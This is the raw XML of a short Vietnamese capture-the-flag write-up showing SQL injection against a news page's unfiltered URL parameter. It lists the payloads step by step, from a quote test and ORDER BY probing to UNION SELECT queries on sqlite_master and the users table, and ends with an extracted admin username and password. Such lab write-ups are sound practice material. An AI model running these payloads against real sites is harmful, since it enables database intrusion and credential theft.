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B74D" w14:textId="3EC54D74" w:rsidR="00040F50" w:rsidRDefault="00040F50" w:rsidP="00CA29C8">
      <w:r>
        <w:t>Đầu tiên vào web vào mục news thì thấy url không filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538FA2CC" w14:textId="0B64C142" w:rsidR="00CA29C8" w:rsidRDefault="00CA29C8" w:rsidP="00CA29C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26C76891" wp14:editId="4B03407E">
            <wp:extent cx="5842000" cy="4299307"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="164226682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66820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311" t="8676" r="75701" b="59941"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5845252" cy="43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9EA99" w14:textId="37DED451" w:rsidR="00040F50" w:rsidRDefault="00040F50" w:rsidP="00CA29C8">
      <w:r>
        <w:t>Vào thử mục news</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48655F6C" w14:textId="77777777" w:rsidR="00CA29C8" w:rsidRDefault="00CA29C8" w:rsidP="00CA29C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56CDF5FE" wp14:editId="3662F168">
            <wp:extent cx="6102350" cy="2932578"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="50696092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60925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t="8492" r="70613" b="66402"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6114971" cy="293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1041B" w14:textId="2903BD30" w:rsidR="00040F50" w:rsidRDefault="00040F50" w:rsidP="00CA29C8">
      <w:r>
        <w:t>Thực hiện thử 1’ thì báo lỗi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740AA0FA" w14:textId="77777777" w:rsidR="00CA29C8" w:rsidRDefault="00CA29C8" w:rsidP="00CA29C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0CD3FE59" wp14:editId="3BD14E76">
            <wp:extent cx="6038850" cy="1588652"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="62877349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3494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t="3877" r="36448" b="66402"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6048748" cy="159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E827E" w14:textId="1037F4F1" w:rsidR="00CA29C8" w:rsidRDefault="00040F50" w:rsidP="00CA29C8">
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00CA29C8">
        <w:t>1 order by 4--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B70F65D" w14:textId="77777777" w:rsidR="00CA29C8" w:rsidRDefault="00CA29C8" w:rsidP="00CA29C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67BBCC32" wp14:editId="2A95975F">
            <wp:extent cx="5969833" cy="1498600"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="185056989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69894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104" t="8307" r="24195" b="57910"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5976768" cy="150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54C4" w14:textId="20E56927" w:rsidR="00040F50" w:rsidRDefault="00040F50" w:rsidP="00CA29C8">
      <w:r>
        <w:t xml:space="preserve">Thực hiện thử </w:t>
      </w:r>
      <w:r w:rsidRPr="00040F50">
        <w:t>1 union select 1,2,3--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A8186A" w14:textId="77777777" w:rsidR="00CA29C8" w:rsidRDefault="00CA29C8" w:rsidP="00CA29C8">
      <w:r w:rsidRPr="00A25087">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="47DCDEFE" wp14:editId="7F639B0C">
            <wp:extent cx="6115050" cy="2131060"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="95666768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67689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710E" w14:textId="55A69C1E" w:rsidR="00CA29C8" w:rsidRDefault="00040F50" w:rsidP="00CA29C8">
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidR="00CA29C8" w:rsidRPr="001462E5">
        <w:t xml:space="preserve">1 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00CA29C8" w:rsidRPr="001462E5">
        <w:t>1,sql</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00CA29C8" w:rsidRPr="001462E5">
        <w:t>,3 FROM sqlite_master--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA6D1B1" w14:textId="77777777" w:rsidR="00CA29C8" w:rsidRDefault="00CA29C8" w:rsidP="00CA29C8">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2B402754" wp14:editId="573180AE">
            <wp:extent cx="6115050" cy="3439795"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="158554798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47989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4BAB" w14:textId="77777777" w:rsidR="00D523DC" w:rsidRDefault="00D523DC"/>
    <w:p w14:paraId="2E4C62E6" w14:textId="7D3C147D" w:rsidR="00040F50" w:rsidRDefault="00040F50">
      <w:r>
        <w:t xml:space="preserve">Thực hiện </w:t>
      </w:r>
      <w:r w:rsidRPr="00040F50">
        <w:t xml:space="preserve">1 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00040F50">
        <w:t>1,username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00040F50">
        <w:t>,password FROM user</w:t>
      </w:r>
      <w:r>
        <w:t>s--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2C0532" w14:textId="0B6519EB" w:rsidR="00040F50" w:rsidRDefault="00040F50">
      <w:r>
        <w:t xml:space="preserve"> Ta có flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="783ACF04" wp14:editId="144083D1">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="91633115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31150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1042" w14:textId="77777777" w:rsidR="00336C2C" w:rsidRDefault="00336C2C" w:rsidP="00336C2C">
      <w:r>
        <w:t>admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FD3E10" w14:textId="503BAAF6" w:rsidR="00336C2C" w:rsidRDefault="00336C2C" w:rsidP="00336C2C">
      <w:r>
        <w:t>aTlkJYLjcbLmue3</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0033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51"/>
    <w:rsid w:val="00040F50"/>
    <w:rsid w:val="00336C2C"/>
    <w:rsid w:val="00C03051"/>
    <w:rsid w:val="00CA29C8"/>
    <w:rsid w:val="00D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416C"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B26AD7B7-6991-4EEB-AE72-0C1CA1C5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C8"/>
    <w:pPr>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr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2023-04-07T17:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-07T17:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>